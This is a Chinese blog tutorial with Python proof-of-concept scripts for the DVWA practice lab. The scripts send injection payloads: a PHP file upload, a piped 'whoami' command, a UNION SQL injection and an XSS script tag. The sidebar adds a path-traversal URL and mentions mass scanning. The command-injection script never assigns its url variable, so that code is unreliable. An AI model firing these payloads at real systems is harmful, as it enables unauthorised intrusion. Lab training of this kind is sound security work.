python编写简单poc,验证dvwa靶场

已于 2023-09-02 16:59:48 修改
阅读量391 收藏 7
点赞数 2
分类专栏: 网络安全基础 文章标签: python 网络安全
于 2023-09-02 16:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46107438/article/details/132639997
版权
  • 以dvwa靶场为例,用来了解python编写的poc的大致作用及简单结构

文章目录

dvwa_文件上传

源代码

# coding=utf-8

import requests    # 导入requests库


def glfusion_upload(url):
    path = "/dvwa/vulnerabilities/upload/" # 上传入口
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Cookie": "security=low; PHPSESSID=lnltlp1bo624ov467mlhcgl692",
    }#请求头构造


    files = {
        "MAX_FILE_SIZE": (None, "100000"),
        "uploaded": ("phpinfo.php", "<?php phpinfo();?>"),
        "Upload": (None, "Upload")
        }
    # files根据抓包结果写成列表“name” “filename” “内容”
    resp = requests.post(url + path, headers=headers, files=files)
    print(resp.text)

    poc_path = "/dvwa/hackable/uploads/phpinfo.php"
    resp2 = requests.post(url+poc_path)
    if "PHP Version" in resp2.text:
        print("[+]", url, "存在文件上传漏洞")
    else:
        print("[-]", url, "未发现文件上传漏洞")


if "__main__" == __name__:

    url = input('输入需要检测的url:')
    glfusion_upload("http://" + url)
    # glfusion_upload('http://127.0.0.1')

部分数据来源

请求头

在这里插入图片描述

上传文件内容

在这里插入图片描述

dvwa_命令注入

源代码

import requests


def verify(url):
    try:
        target= url + "/dvwa/vulnerabilities/exec/"
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Cookie": "security=low; PHPSESSID=lnltlp1bo624ov467mlhcgl692",
        }
        data={
            "ip":"127.0.0.1|whoami /user",
            "Submit":"Submit"
            }
        resp = requests.post(target, headers=headers, data=data)
        print(resp.text)
        if "SID" in resp.text:
            print("[+]", url, "存在命令注入漏洞")
        else:
            print("[-]", url, "未发现命令注入漏洞")
    except Exception as e:
        print ("Something happend....")
        print (e)

def main():
    input('输入请要检测的url:')
    if(url):
        verify("http://" + url)
    else: print ("出错")


if __name__=='__main__':
    main()

部分说明

  • 当内容为如下:

在这里插入图片描述

  • 须在requests的参数里加上data

dvwa_sql注入

源代码

import requests
import hashlib

def verify(url):
    try:
        target = url + "/dvwa/vulnerabilities/sqli/?id=1'+union+select+1%2Cmd5(123)%23&Submit=Submit#"
        print("123")
        headers = {
            "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0",
            "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Cookie":"security=low; PHPSESSID=qd3ant7dc007c9pc4d964pp881"
        }
        res = requests.get(url=target,headers=headers)
        print(res.text)
        if hashlib.md5('123'.encode("utf-8")).hexdigest() in res.text:
            print("sql注入漏洞存在!!!")
        else: print("未发现sql注入漏洞。")

    except Exception as e:
        print("错误:")
        print(e)
      
def main():
    url = input("请输入url:")
    verify("http://" + url)

if __name__ == "__main__":
    main()

dvwa_反射型XSS

源代码

import requests

def verify(url):
    target = url + "/dvwa/vulnerabilities/xss_r/?name=<script>alert('j.xss')<%2Fscript>#"
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Cookie":"security=low; PHPSESSID=qd3ant7dc007c9pc4d964pp881"
    }
    print(target)
    try:
        req = requests.get(url=target,headers=headers)
        print(req.status_code)
        print(req.text)
        if("j.xss" in req.text):
            print("存在反射性xss漏洞!")
        else: print("未检测出反射性xss漏洞。")
    except Exception as e:
        print("错误:")
        print(e)

def main():
    url = input("要检测的url:")
    verify("http://" + url)
  
if __name__ == "__main__":
    main()

部分说明

头文件包含登录信息cookie,不添加或错误导致返回页面未登陆页面!

Change State
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python编写EXP/POC速成小记
U_U520的博客
02-22 1903
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
chatgpt赋能pythonPythonPOC:提高网络安全攻防技能的利器
weixin_45566993的博客
06-02 500
POC是指为了验证某项功能是否存在或漏洞是否可被成功利用的一段代码。在网络安全领域中,POC通常被用于验证漏洞是否存在或者可被攻击者利用。POC可以用于漏洞发现过程中,攻击者通过编写和利用POC来寻找漏洞。同时,POC也可以用于漏洞修复过程中,安全研究人员或漏洞发现者利用POC验证漏洞是否已经被修复。POC通常表示为一些脚本程序或者独立的应用程序。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc。
Python从入门到编写POC之读写文件1
08-03
一个文件被打开后,有一个file对象,可以得到有关该文件的各种信息,以下是一些使用方法:file.closed 返回true如果文件已被关闭,否则返回false
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发)
最新发布
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 项目简介: 编写这款程序的最终目标,是希望实现一款python 3下的Web安全检测PoC&&EXP框架,目前已经推出的、知名的、相类似的框架,是仅在py 2.7下的tangscan及Pocsuite,目前笔者所完成的,是创造这个轮子的第一步,python 3下的一款PoC&&EXP模板
python开发poc,fofa爬虫批量化扫洞
san3144393495的博客
04-07 654
学习使用python做到批量化的漏洞脚本1.通过fofa搜索结果来采集脚本2.批量化扫描漏洞---glassfish存在任意文件读取在默认48484端口,漏洞验证poc为:"glassfish" && port="4848" && country="CN"http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
python爬虫_自动获取seebug的poc实例
09-21
下面小编就为大家带来一篇python爬虫_自动获取seebug的poc实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
PocList:python或go编写poc
04-04
PocList python或go编写poc
PythonPOC编写
qq_59923059的博客
08-15 1792
PythonPOC编写入门
python 一个通用的POC模板
YouthBelief的博客
02-16 1280
0x00 前言 平时工作中 需要编写pocpoc 大多步骤是重复的 比如用户输入 等 因此写一套模板 直接套用即可 0x01 模板编写 1.1 引入库 import sys import getopt import requests import threading import time import os import datetime import urllib3 from colorama import init, Fore # 修改命令行中颜色的库 #禁用https安全请求警告 以防
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3322
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和没说一样。想象一下这样的场景,目标存在一个 SQL...
Python-一个基于burp的反射型xss检测插件
08-12
一个基于burp的反射型xss检测插件
Python从入门到编写POC之特殊函数1
08-03
Python从入门到编写POC之特殊函数1
POC&EXP编写指南.rar
02-11
POC&EXP编写指南 详细讲述了POC&EXP的编写方式,很实用
寒假学习第24天---PythonPoc基础编写(二)
m0_73581247的博客
02-04 1719
又来了哈,小六花祝你早日学习poc编写,上一次的poc编写链接链接主要用于自动化测试网站的登录功能,特别是在有多个URL需要测试时,可以大大节省时间,不知不觉已经24天了,希望大家关注一下我,嘿嘿,六花祝你新年快乐。
DVWA布尔盲注Low级Python脚本
m0_74485250的博客
02-21 554
【代码】DVWA布尔盲注Low级Python脚本。
一篇文章教你学如何编写poc
weixin_62369433的博客
04-10 2794
POC 指 Proof of Concept(概念验证),是指一个可行性验证,即通过构建一个小型系统或单项功能来验证技术的可行性和正确性。POC 脚本,就是为了验证特定安全漏洞或安全问题而编写的脚本,可用于检测该漏洞是否存在,以及漏洞的利用方式和危害范围。POC 脚本可以帮助安全研究人员快速、简便地检测漏洞,而不需要手动去复现漏洞,减轻了工作难度。POC 脚本可以验证漏洞的利用方式和危害范围,帮助安全研究人员更好地了解漏洞对系统的影响,从而更好地为漏洞修复提供技术支持。
python poc模板
m0_65109001的博客
04-03 241
自己写了一个漏扫模板,方便使用。
Python小练习】使用Python编写POC 脚本-上篇
慢就是快
09-13 489
Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为**漏洞验证程序,**类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
编写一个能够验证dvwasql注入漏洞的poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值